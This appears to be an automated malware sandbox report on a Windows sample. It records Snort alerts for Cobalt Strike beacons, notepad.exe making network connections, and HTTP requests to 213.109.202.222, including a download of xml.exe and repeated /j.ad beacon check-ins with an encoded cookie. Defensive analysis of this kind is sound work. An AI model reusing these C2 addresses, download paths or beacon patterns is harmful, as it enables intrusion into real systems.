HTTP Parser: No favicon

Source: unknown	HTTPS traffic detected: 20.12.23.50:443 -> 192.168.2.17:49709 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 23.51.58.94:443 -> 192.168.2.17:49757 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 23.51.58.94:443 -> 192.168.2.17:49758 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 20.12.23.50:443 -> 192.168.2.17:49824 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 40.126.24.148:443 -> 192.168.2.17:49828 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 13.107.5.88:443 -> 192.168.2.17:49866 version: TLS 1.2

Source: C:\Program Files (x86)\Internet Explorer\iexplore.exe

Process created: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\BHO\ie_to_edge_stub.exe

Networking

Snort IDS alert for network traffic

Source: Traffic	Snort IDS: 2019714 ET CURRENT_EVENTS Terse alphanumeric executable downloader high likelihood of being hostile 192.168.2.17:49825 -> 213.109.202.222:80
Source: Traffic	Snort IDS: 2033713 ET TROJAN Cobalt Strike Beacon Observed 192.168.2.17:49837 -> 213.109.202.222:80
Source: Traffic	Snort IDS: 2033713 ET TROJAN Cobalt Strike Beacon Observed 192.168.2.17:49838 -> 213.109.202.222:80
Source: Traffic	Snort IDS: 2033713 ET TROJAN Cobalt Strike Beacon Observed 192.168.2.17:49839 -> 213.109.202.222:80
Source: Traffic	Snort IDS: 2033713 ET TROJAN Cobalt Strike Beacon Observed 192.168.2.17:49840 -> 213.109.202.222:80
Source: Traffic	Snort IDS: 2033713 ET TROJAN Cobalt Strike Beacon Observed 192.168.2.17:49842 -> 213.109.202.222:80
Source: Traffic	Snort IDS: 2033713 ET TROJAN Cobalt Strike Beacon Observed 192.168.2.17:49843 -> 213.109.202.222:80
Source: Traffic	Snort IDS: 2033713 ET TROJAN Cobalt Strike Beacon Observed 192.168.2.17:49844 -> 213.109.202.222:80
Source: Traffic	Snort IDS: 2033713 ET TROJAN Cobalt Strike Beacon Observed 192.168.2.17:49845 -> 213.109.202.222:80
Source: Traffic	Snort IDS: 2033713 ET TROJAN Cobalt Strike Beacon Observed 192.168.2.17:49846 -> 213.109.202.222:80
Source: Traffic	Snort IDS: 2033713 ET TROJAN Cobalt Strike Beacon Observed 192.168.2.17:49847 -> 213.109.202.222:80
Source: Traffic	Snort IDS: 2033713 ET TROJAN Cobalt Strike Beacon Observed 192.168.2.17:49848 -> 213.109.202.222:80
Source: Traffic	Snort IDS: 2033713 ET TROJAN Cobalt Strike Beacon Observed 192.168.2.17:49849 -> 213.109.202.222:80
Source: Traffic	Snort IDS: 2033713 ET TROJAN Cobalt Strike Beacon Observed 192.168.2.17:49850 -> 213.109.202.222:80
Source: Traffic	Snort IDS: 2033713 ET TROJAN Cobalt Strike Beacon Observed 192.168.2.17:49851 -> 213.109.202.222:80
Source: Traffic	Snort IDS: 2033713 ET TROJAN Cobalt Strike Beacon Observed 192.168.2.17:49853 -> 213.109.202.222:80
Source: Traffic	Snort IDS: 2033713 ET TROJAN Cobalt Strike Beacon Observed 192.168.2.17:49854 -> 213.109.202.222:80
Source: Traffic	Snort IDS: 2033713 ET TROJAN Cobalt Strike Beacon Observed 192.168.2.17:49855 -> 213.109.202.222:80
Source: Traffic	Snort IDS: 2033713 ET TROJAN Cobalt Strike Beacon Observed 192.168.2.17:49857 -> 213.109.202.222:80
Source: Traffic	Snort IDS: 2033713 ET TROJAN Cobalt Strike Beacon Observed 192.168.2.17:49858 -> 213.109.202.222:80
Source: Traffic	Snort IDS: 2033713 ET TROJAN Cobalt Strike Beacon Observed 192.168.2.17:49859 -> 213.109.202.222:80
Source: Traffic	Snort IDS: 2033713 ET TROJAN Cobalt Strike Beacon Observed 192.168.2.17:49860 -> 213.109.202.222:80
Source: Traffic	Snort IDS: 2033713 ET TROJAN Cobalt Strike Beacon Observed 192.168.2.17:49861 -> 213.109.202.222:80
Source: Traffic	Snort IDS: 2033713 ET TROJAN Cobalt Strike Beacon Observed 192.168.2.17:49862 -> 213.109.202.222:80
Source: Traffic	Snort IDS: 2033713 ET TROJAN Cobalt Strike Beacon Observed 192.168.2.17:49863 -> 213.109.202.222:80
Source: Traffic	Snort IDS: 2033713 ET TROJAN Cobalt Strike Beacon Observed 192.168.2.17:49865 -> 213.109.202.222:80
Source: Traffic	Snort IDS: 2033713 ET TROJAN Cobalt Strike Beacon Observed 192.168.2.17:49868 -> 213.109.202.222:80
Source: Traffic	Snort IDS: 2033713 ET TROJAN Cobalt Strike Beacon Observed 192.168.2.17:49869 -> 213.109.202.222:80
Source: Traffic	Snort IDS: 2033713 ET TROJAN Cobalt Strike Beacon Observed 192.168.2.17:49870 -> 213.109.202.222:80
Source: Traffic	Snort IDS: 2033713 ET TROJAN Cobalt Strike Beacon Observed 192.168.2.17:49871 -> 213.109.202.222:80
Source: Traffic	Snort IDS: 2033713 ET TROJAN Cobalt Strike Beacon Observed 192.168.2.17:49872 -> 213.109.202.222:80
Source: Traffic	Snort IDS: 2033713 ET TROJAN Cobalt Strike Beacon Observed 192.168.2.17:49873 -> 213.109.202.222:80
Source: Traffic	Snort IDS: 2033713 ET TROJAN Cobalt Strike Beacon Observed 192.168.2.17:49875 -> 213.109.202.222:80
Source: Traffic	Snort IDS: 2033713 ET TROJAN Cobalt Strike Beacon Observed 192.168.2.17:49876 -> 213.109.202.222:80
Source: Traffic	Snort IDS: 2033713 ET TROJAN Cobalt Strike Beacon Observed 192.168.2.17:49877 -> 213.109.202.222:80
Source: Traffic	Snort IDS: 2033713 ET TROJAN Cobalt Strike Beacon Observed 192.168.2.17:49878 -> 213.109.202.222:80
Source: Traffic	Snort IDS: 2033713 ET TROJAN Cobalt Strike Beacon Observed 192.168.2.17:49879 -> 213.109.202.222:80
Source: Traffic	Snort IDS: 2033713 ET TROJAN Cobalt Strike Beacon Observed 192.168.2.17:49880 -> 213.109.202.222:80
Source: Traffic	Snort IDS: 2033713 ET TROJAN Cobalt Strike Beacon Observed 192.168.2.17:49882 -> 213.109.202.222:80
Source: Traffic	Snort IDS: 2033713 ET TROJAN Cobalt Strike Beacon Observed 192.168.2.17:49884 -> 213.109.202.222:80
Source: Traffic	Snort IDS: 2033713 ET TROJAN Cobalt Strike Beacon Observed 192.168.2.17:49886 -> 213.109.202.222:80
Source: Traffic	Snort IDS: 2033713 ET TROJAN Cobalt Strike Beacon Observed 192.168.2.17:49887 -> 213.109.202.222:80
Source: Traffic	Snort IDS: 2033713 ET TROJAN Cobalt Strike Beacon Observed 192.168.2.17:49888 -> 213.109.202.222:80
Source: Traffic	Snort IDS: 2033713 ET TROJAN Cobalt Strike Beacon Observed 192.168.2.17:49889 -> 213.109.202.222:80
Source: Traffic	Snort IDS: 2033713 ET TROJAN Cobalt Strike Beacon Observed 192.168.2.17:49890 -> 213.109.202.222:80
Source: Traffic	Snort IDS: 2033713 ET TROJAN Cobalt Strike Beacon Observed 192.168.2.17:49891 -> 213.109.202.222:80
Source: Traffic	Snort IDS: 2033713 ET TROJAN Cobalt Strike Beacon Observed 192.168.2.17:49892 -> 213.109.202.222:80
Source: Traffic	Snort IDS: 2033713 ET TROJAN Cobalt Strike Beacon Observed 192.168.2.17:49893 -> 213.109.202.222:80
Source: Traffic	Snort IDS: 2033713 ET TROJAN Cobalt Strike Beacon Observed 192.168.2.17:49894 -> 213.109.202.222:80
Source: Traffic	Snort IDS: 2033713 ET TROJAN Cobalt Strike Beacon Observed 192.168.2.17:49895 -> 213.109.202.222:80
Source: Traffic	Snort IDS: 2033713 ET TROJAN Cobalt Strike Beacon Observed 192.168.2.17:49897 -> 213.109.202.222:80
Source: Traffic	Snort IDS: 2033713 ET TROJAN Cobalt Strike Beacon Observed 192.168.2.17:49898 -> 213.109.202.222:80
Source: Traffic	Snort IDS: 2033713 ET TROJAN Cobalt Strike Beacon Observed 192.168.2.17:49899 -> 213.109.202.222:80
Source: Traffic	Snort IDS: 2033713 ET TROJAN Cobalt Strike Beacon Observed 192.168.2.17:49900 -> 213.109.202.222:80
Source: Traffic	Snort IDS: 2033713 ET TROJAN Cobalt Strike Beacon Observed 192.168.2.17:49901 -> 213.109.202.222:80
Source: Traffic	Snort IDS: 2033713 ET TROJAN Cobalt Strike Beacon Observed 192.168.2.17:49902 -> 213.109.202.222:80
Source: Traffic	Snort IDS: 2033713 ET TROJAN Cobalt Strike Beacon Observed 192.168.2.17:49906 -> 213.109.202.222:80
Source: Traffic	Snort IDS: 2033713 ET TROJAN Cobalt Strike Beacon Observed 192.168.2.17:49907 -> 213.109.202.222:80
Source: Traffic	Snort IDS: 2033713 ET TROJAN Cobalt Strike Beacon Observed 192.168.2.17:49908 -> 213.109.202.222:80
Source: Traffic	Snort IDS: 2033713 ET TROJAN Cobalt Strike Beacon Observed 192.168.2.17:49909 -> 213.109.202.222:80
Source: Traffic	Snort IDS: 2033713 ET TROJAN Cobalt Strike Beacon Observed 192.168.2.17:49910 -> 213.109.202.222:80
Source: Traffic	Snort IDS: 2033713 ET TROJAN Cobalt Strike Beacon Observed 192.168.2.17:49911 -> 213.109.202.222:80
Source: Traffic	Snort IDS: 2033713 ET TROJAN Cobalt Strike Beacon Observed 192.168.2.17:49912 -> 213.109.202.222:80
Source: Traffic	Snort IDS: 2033713 ET TROJAN Cobalt Strike Beacon Observed 192.168.2.17:49913 -> 213.109.202.222:80
Source: Traffic	Snort IDS: 2033713 ET TROJAN Cobalt Strike Beacon Observed 192.168.2.17:49914 -> 213.109.202.222:80
Source: Traffic	Snort IDS: 2033713 ET TROJAN Cobalt Strike Beacon Observed 192.168.2.17:49915 -> 213.109.202.222:80
Source: Traffic	Snort IDS: 2033713 ET TROJAN Cobalt Strike Beacon Observed 192.168.2.17:49918 -> 213.109.202.222:80
Source: Traffic	Snort IDS: 2033713 ET TROJAN Cobalt Strike Beacon Observed 192.168.2.17:49919 -> 213.109.202.222:80
Source: Traffic	Snort IDS: 2033713 ET TROJAN Cobalt Strike Beacon Observed 192.168.2.17:49920 -> 213.109.202.222:80
Source: Traffic	Snort IDS: 2033713 ET TROJAN Cobalt Strike Beacon Observed 192.168.2.17:49921 -> 213.109.202.222:80
Source: Traffic	Snort IDS: 2033713 ET TROJAN Cobalt Strike Beacon Observed 192.168.2.17:49923 -> 213.109.202.222:80
Source: Traffic	Snort IDS: 2033713 ET TROJAN Cobalt Strike Beacon Observed 192.168.2.17:49924 -> 213.109.202.222:80
Source: Traffic	Snort IDS: 2033713 ET TROJAN Cobalt Strike Beacon Observed 192.168.2.17:49925 -> 213.109.202.222:80
Source: Traffic	Snort IDS: 2033713 ET TROJAN Cobalt Strike Beacon Observed 192.168.2.17:49926 -> 213.109.202.222:80
Source: Traffic	Snort IDS: 2033713 ET TROJAN Cobalt Strike Beacon Observed 192.168.2.17:49927 -> 213.109.202.222:80
Source: Traffic	Snort IDS: 2033713 ET TROJAN Cobalt Strike Beacon Observed 192.168.2.17:49928 -> 213.109.202.222:80
Source: Traffic	Snort IDS: 2033713 ET TROJAN Cobalt Strike Beacon Observed 192.168.2.17:49929 -> 213.109.202.222:80
Source: Traffic	Snort IDS: 2033713 ET TROJAN Cobalt Strike Beacon Observed 192.168.2.17:49930 -> 213.109.202.222:80
Source: Traffic	Snort IDS: 2033713 ET TROJAN Cobalt Strike Beacon Observed 192.168.2.17:49931 -> 213.109.202.222:80
Source: Traffic	Snort IDS: 2033713 ET TROJAN Cobalt Strike Beacon Observed 192.168.2.17:49932 -> 213.109.202.222:80
Source: Traffic	Snort IDS: 2033713 ET TROJAN Cobalt Strike Beacon Observed 192.168.2.17:49933 -> 213.109.202.222:80
Source: Traffic	Snort IDS: 2033713 ET TROJAN Cobalt Strike Beacon Observed 192.168.2.17:49934 -> 213.109.202.222:80
Source: Traffic	Snort IDS: 2033713 ET TROJAN Cobalt Strike Beacon Observed 192.168.2.17:49935 -> 213.109.202.222:80
Source: Traffic	Snort IDS: 2033713 ET TROJAN Cobalt Strike Beacon Observed 192.168.2.17:49936 -> 213.109.202.222:80
Source: Traffic	Snort IDS: 2033713 ET TROJAN Cobalt Strike Beacon Observed 192.168.2.17:49937 -> 213.109.202.222:80
Source: Traffic	Snort IDS: 2033713 ET TROJAN Cobalt Strike Beacon Observed 192.168.2.17:49938 -> 213.109.202.222:80
Source: Traffic	Snort IDS: 2033713 ET TROJAN Cobalt Strike Beacon Observed 192.168.2.17:49939 -> 213.109.202.222:80
Source: Traffic	Snort IDS: 2033713 ET TROJAN Cobalt Strike Beacon Observed 192.168.2.17:49940 -> 213.109.202.222:80
Source: Traffic	Snort IDS: 2033713 ET TROJAN Cobalt Strike Beacon Observed 192.168.2.17:49941 -> 213.109.202.222:80
Source: Traffic	Snort IDS: 2033713 ET TROJAN Cobalt Strike Beacon Observed 192.168.2.17:49942 -> 213.109.202.222:80
Source: Traffic	Snort IDS: 2033713 ET TROJAN Cobalt Strike Beacon Observed 192.168.2.17:49944 -> 213.109.202.222:80
Source: Traffic	Snort IDS: 2033713 ET TROJAN Cobalt Strike Beacon Observed 192.168.2.17:49945 -> 213.109.202.222:80
Source: Traffic	Snort IDS: 2033713 ET TROJAN Cobalt Strike Beacon Observed 192.168.2.17:49946 -> 213.109.202.222:80
Source: Traffic	Snort IDS: 2033713 ET TROJAN Cobalt Strike Beacon Observed 192.168.2.17:49947 -> 213.109.202.222:80
Source: Traffic	Snort IDS: 2033713 ET TROJAN Cobalt Strike Beacon Observed 192.168.2.17:49948 -> 213.109.202.222:80
Source: Traffic	Snort IDS: 2033713 ET TROJAN Cobalt Strike Beacon Observed 192.168.2.17:49949 -> 213.109.202.222:80
Source: Traffic	Snort IDS: 2033713 ET TROJAN Cobalt Strike Beacon Observed 192.168.2.17:49950 -> 213.109.202.222:80
Source: Traffic	Snort IDS: 2033713 ET TROJAN Cobalt Strike Beacon Observed 192.168.2.17:49951 -> 213.109.202.222:80
Source: Traffic	Snort IDS: 2033713 ET TROJAN Cobalt Strike Beacon Observed 192.168.2.17:49952 -> 213.109.202.222:80
Source: Traffic	Snort IDS: 2033713 ET TROJAN Cobalt Strike Beacon Observed 192.168.2.17:49953 -> 213.109.202.222:80
Source: Traffic	Snort IDS: 2033713 ET TROJAN Cobalt Strike Beacon Observed 192.168.2.17:49954 -> 213.109.202.222:80
Source: Traffic	Snort IDS: 2033713 ET TROJAN Cobalt Strike Beacon Observed 192.168.2.17:49955 -> 213.109.202.222:80
Source: Traffic	Snort IDS: 2033713 ET TROJAN Cobalt Strike Beacon Observed 192.168.2.17:49956 -> 213.109.202.222:80
Source: Traffic	Snort IDS: 2033713 ET TROJAN Cobalt Strike Beacon Observed 192.168.2.17:49957 -> 213.109.202.222:80
Source: Traffic	Snort IDS: 2033713 ET TROJAN Cobalt Strike Beacon Observed 192.168.2.17:49958 -> 213.109.202.222:80
Source: Traffic	Snort IDS: 2033713 ET TROJAN Cobalt Strike Beacon Observed 192.168.2.17:49959 -> 213.109.202.222:80
Source: Traffic	Snort IDS: 2033713 ET TROJAN Cobalt Strike Beacon Observed 192.168.2.17:49960 -> 213.109.202.222:80
Source: Traffic	Snort IDS: 2033713 ET TROJAN Cobalt Strike Beacon Observed 192.168.2.17:49961 -> 213.109.202.222:80
Source: Traffic	Snort IDS: 2033713 ET TROJAN Cobalt Strike Beacon Observed 192.168.2.17:49962 -> 213.109.202.222:80
Source: Traffic	Snort IDS: 2033713 ET TROJAN Cobalt Strike Beacon Observed 192.168.2.17:49963 -> 213.109.202.222:80
Source: Traffic	Snort IDS: 2033713 ET TROJAN Cobalt Strike Beacon Observed 192.168.2.17:49964 -> 213.109.202.222:80
Source: Traffic	Snort IDS: 2033713 ET TROJAN Cobalt Strike Beacon Observed 192.168.2.17:49965 -> 213.109.202.222:80
Source: Traffic	Snort IDS: 2033713 ET TROJAN Cobalt Strike Beacon Observed 192.168.2.17:49966 -> 213.109.202.222:80
Source: Traffic	Snort IDS: 2033713 ET TROJAN Cobalt Strike Beacon Observed 192.168.2.17:49967 -> 213.109.202.222:80
Source: Traffic	Snort IDS: 2033713 ET TROJAN Cobalt Strike Beacon Observed 192.168.2.17:49968 -> 213.109.202.222:80
Source: Traffic	Snort IDS: 2033713 ET TROJAN Cobalt Strike Beacon Observed 192.168.2.17:49969 -> 213.109.202.222:80
Source: Traffic	Snort IDS: 2033713 ET TROJAN Cobalt Strike Beacon Observed 192.168.2.17:49972 -> 213.109.202.222:80
Source: Traffic	Snort IDS: 2033713 ET TROJAN Cobalt Strike Beacon Observed 192.168.2.17:49973 -> 213.109.202.222:80
Source: Traffic	Snort IDS: 2033713 ET TROJAN Cobalt Strike Beacon Observed 192.168.2.17:49974 -> 213.109.202.222:80
Source: Traffic	Snort IDS: 2033713 ET TROJAN Cobalt Strike Beacon Observed 192.168.2.17:49975 -> 213.109.202.222:80
Source: Traffic	Snort IDS: 2033713 ET TROJAN Cobalt Strike Beacon Observed 192.168.2.17:49976 -> 213.109.202.222:80
Source: Traffic	Snort IDS: 2033713 ET TROJAN Cobalt Strike Beacon Observed 192.168.2.17:49977 -> 213.109.202.222:80

System process connects to network (likely due to code injection or exploit)

Source: C:\Windows\System32\notepad.exe

Network Connect: 213.109.202.222 80

Source: unknown	TCP traffic detected without corresponding DNS query: 184.30.122.249
Source: unknown	TCP traffic detected without corresponding DNS query: 184.30.122.249
Source: unknown	TCP traffic detected without corresponding DNS query: 23.206.222.123
Source: unknown	TCP traffic detected without corresponding DNS query: 23.206.222.123
Source: unknown	TCP traffic detected without corresponding DNS query: 204.79.197.200
Source: unknown	TCP traffic detected without corresponding DNS query: 204.79.197.200
Source: unknown	TCP traffic detected without corresponding DNS query: 204.79.197.200
Source: unknown	TCP traffic detected without corresponding DNS query: 213.109.202.222
Source: unknown	TCP traffic detected without corresponding DNS query: 213.109.202.222
Source: unknown	TCP traffic detected without corresponding DNS query: 213.109.202.222
Source: unknown	TCP traffic detected without corresponding DNS query: 213.109.202.222
Source: unknown	TCP traffic detected without corresponding DNS query: 213.109.202.222
Source: unknown	TCP traffic detected without corresponding DNS query: 213.109.202.222
Source: unknown	TCP traffic detected without corresponding DNS query: 213.109.202.222
Source: unknown	TCP traffic detected without corresponding DNS query: 213.109.202.222
Source: unknown	TCP traffic detected without corresponding DNS query: 213.109.202.222
Source: unknown	TCP traffic detected without corresponding DNS query: 213.109.202.222
Source: unknown	TCP traffic detected without corresponding DNS query: 213.109.202.222
Source: unknown	TCP traffic detected without corresponding DNS query: 213.109.202.222
Source: unknown	TCP traffic detected without corresponding DNS query: 213.109.202.222
Source: unknown	TCP traffic detected without corresponding DNS query: 20.12.23.50
Source: unknown	TCP traffic detected without corresponding DNS query: 20.12.23.50
Source: unknown	TCP traffic detected without corresponding DNS query: 20.12.23.50
Source: unknown	TCP traffic detected without corresponding DNS query: 20.12.23.50
Source: unknown	TCP traffic detected without corresponding DNS query: 20.12.23.50
Source: unknown	TCP traffic detected without corresponding DNS query: 20.12.23.50
Source: unknown	TCP traffic detected without corresponding DNS query: 20.12.23.50
Source: unknown	TCP traffic detected without corresponding DNS query: 20.12.23.50
Source: unknown	TCP traffic detected without corresponding DNS query: 20.12.23.50
Source: unknown	TCP traffic detected without corresponding DNS query: 20.12.23.50
Source: unknown	TCP traffic detected without corresponding DNS query: 20.12.23.50
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	TCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknown	TCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknown	TCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknown	TCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknown	TCP traffic detected without corresponding DNS query: 23.51.58.94
Source: unknown	TCP traffic detected without corresponding DNS query: 23.51.58.94
Source: unknown	TCP traffic detected without corresponding DNS query: 23.51.58.94
Source: unknown	TCP traffic detected without corresponding DNS query: 23.51.58.94
Source: unknown	TCP traffic detected without corresponding DNS query: 23.51.58.94
Source: unknown	TCP traffic detected without corresponding DNS query: 23.51.58.94
Source: unknown	TCP traffic detected without corresponding DNS query: 23.51.58.94
Source: unknown	TCP traffic detected without corresponding DNS query: 23.51.58.94
Source: unknown	TCP traffic detected without corresponding DNS query: 23.51.58.94
Source: unknown	TCP traffic detected without corresponding DNS query: 23.51.58.94
Source: unknown	TCP traffic detected without corresponding DNS query: 23.51.58.94
Source: unknown	TCP traffic detected without corresponding DNS query: 23.51.58.94
Source: unknown	TCP traffic detected without corresponding DNS query: 23.51.58.94

Source: C:\Program Files (x86)\Internet Explorer\iexplore.exe

File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Virtualized\C

Source: global traffic	HTTP traffic detected: GET /download/xml.xml HTTP/1.1Host: 213.109.202.222Connection: keep-aliveUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Encoding: gzip, deflateAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /download/xml.exe HTTP/1.1Host: 213.109.202.222Connection: keep-aliveUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Encoding: gzip, deflateAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global traffic	HTTP traffic detected: GET /j.ad HTTP/1.1Accept: /Cookie: Gif2I3v9iYKmlSvz9ceumxBLnmuli81FyKz7CMD84nk8L41JBdc0FcnQ8H0POD4cujX4gR68tT0fZpcF+3qX9IPNH/BGd7aYkdqDLiXUyY32vofA1BUIqA/z3rcJQy9Qu/5ecgAJvQ+INidT6tUGPPUPSfxlP5IKX/m2DlfI6oU=User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)Host: 213.109.202.222Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /j.ad HTTP/1.1Accept: /Cookie: Gif2I3v9iYKmlSvz9ceumxBLnmuli81FyKz7CMD84nk8L41JBdc0FcnQ8H0POD4cujX4gR68tT0fZpcF+3qX9IPNH/BGd7aYkdqDLiXUyY32vofA1BUIqA/z3rcJQy9Qu/5ecgAJvQ+INidT6tUGPPUPSfxlP5IKX/m2DlfI6oU=User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)Host: 213.109.202.222Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /j.ad HTTP/1.1Accept: /Cookie: Gif2I3v9iYKmlSvz9ceumxBLnmuli81FyKz7CMD84nk8L41JBdc0FcnQ8H0POD4cujX4gR68tT0fZpcF+3qX9IPNH/BGd7aYkdqDLiXUyY32vofA1BUIqA/z3rcJQy9Qu/5ecgAJvQ+INidT6tUGPPUPSfxlP5IKX/m2DlfI6oU=User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)Host: 213.109.202.222Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /j.ad HTTP/1.1Accept: /Cookie: Gif2I3v9iYKmlSvz9ceumxBLnmuli81FyKz7CMD84nk8L41JBdc0FcnQ8H0POD4cujX4gR68tT0fZpcF+3qX9IPNH/BGd7aYkdqDLiXUyY32vofA1BUIqA/z3rcJQy9Qu/5ecgAJvQ+INidT6tUGPPUPSfxlP5IKX/m2DlfI6oU=User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)Host: 213.109.202.222Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /j.ad HTTP/1.1Accept: /Cookie: Gif2I3v9iYKmlSvz9ceumxBLnmuli81FyKz7CMD84nk8L41JBdc0FcnQ8H0POD4cujX4gR68tT0fZpcF+3qX9IPNH/BGd7aYkdqDLiXUyY32vofA1BUIqA/z3rcJQy9Qu/5ecgAJvQ+INidT6tUGPPUPSfxlP5IKX/m2DlfI6oU=User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)Host: 213.109.202.222Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /j.ad HTTP/1.1Accept: /Cookie: Gif2I3v9iYKmlSvz9ceumxBLnmuli81FyKz7CMD84nk8L41JBdc0FcnQ8H0POD4cujX4gR68tT0fZpcF+3qX9IPNH/BGd7aYkdqDLiXUyY32vofA1BUIqA/z3rcJQy9Qu/5ecgAJvQ+INidT6tUGPPUPSfxlP5IKX/m2DlfI6oU=User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)Host: 213.109.202.222Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /j.ad HTTP/1.1Accept: /Cookie: Gif2I3v9iYKmlSvz9ceumxBLnmuli81FyKz7CMD84nk8L41JBdc0FcnQ8H0POD4cujX4gR68tT0fZpcF+3qX9IPNH/BGd7aYkdqDLiXUyY32vofA1BUIqA/z3rcJQy9Qu/5ecgAJvQ+INidT6tUGPPUPSfxlP5IKX/m2DlfI6oU=User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)Host: 213.109.202.222Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /j.ad HTTP/1.1Accept: /Cookie: Gif2I3v9iYKmlSvz9ceumxBLnmuli81FyKz7CMD84nk8L41JBdc0FcnQ8H0POD4cujX4gR68tT0fZpcF+3qX9IPNH/BGd7aYkdqDLiXUyY32vofA1BUIqA/z3rcJQy9Qu/5ecgAJvQ+INidT6tUGPPUPSfxlP5IKX/m2DlfI6oU=User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)Host: 213.109.202.222Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /j.ad HTTP/1.1Accept: /Cookie: Gif2I3v9iYKmlSvz9ceumxBLnmuli81FyKz7CMD84nk8L41JBdc0FcnQ8H0POD4cujX4gR68tT0fZpcF+3qX9IPNH/BGd7aYkdqDLiXUyY32vofA1BUIqA/z3rcJQy9Qu/5ecgAJvQ+INidT6tUGPPUPSfxlP5IKX/m2DlfI6oU=User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)Host: 213.109.202.222Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /j.ad HTTP/1.1Accept: /Cookie: Gif2I3v9iYKmlSvz9ceumxBLnmuli81FyKz7CMD84nk8L41JBdc0FcnQ8H0POD4cujX4gR68tT0fZpcF+3qX9IPNH/BGd7aYkdqDLiXUyY32vofA1BUIqA/z3rcJQy9Qu/5ecgAJvQ+INidT6tUGPPUPSfxlP5IKX/m2DlfI6oU=User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)Host: 213.109.202.222Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /j.ad HTTP/1.1Accept: /Cookie: Gif2I3v9iYKmlSvz9ceumxBLnmuli81FyKz7CMD84nk8L41JBdc0FcnQ8H0POD4cujX4gR68tT0fZpcF+3qX9IPNH/BGd7aYkdqDLiXUyY32vofA1BUIqA/z3rcJQy9Qu/5ecgAJvQ+INidT6tUGPPUPSfxlP5IKX/m2DlfI6oU=User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)Host: 213.109.202.222Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /j.ad HTTP/1.1Accept: /Cookie: Gif2I3v9iYKmlSvz9ceumxBLnmuli81FyKz7CMD84nk8L41JBdc0FcnQ8H0POD4cujX4gR68tT0fZpcF+3qX9IPNH/BGd7aYkdqDLiXUyY32vofA1BUIqA/z3rcJQy9Qu/5ecgAJvQ+INidT6tUGPPUPSfxlP5IKX/m2DlfI6oU=User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)Host: 213.109.202.222Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /j.ad HTTP/1.1Accept: /Cookie: Gif2I3v9iYKmlSvz9ceumxBLnmuli81FyKz7CMD84nk8L41JBdc0FcnQ8H0POD4cujX4gR68tT0fZpcF+3qX9IPNH/BGd7aYkdqDLiXUyY32vofA1BUIqA/z3rcJQy9Qu/5ecgAJvQ+INidT6tUGPPUPSfxlP5IKX/m2DlfI6oU=User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)Host: 213.109.202.222Connection: Keep-AliveCache-Control: no-cache
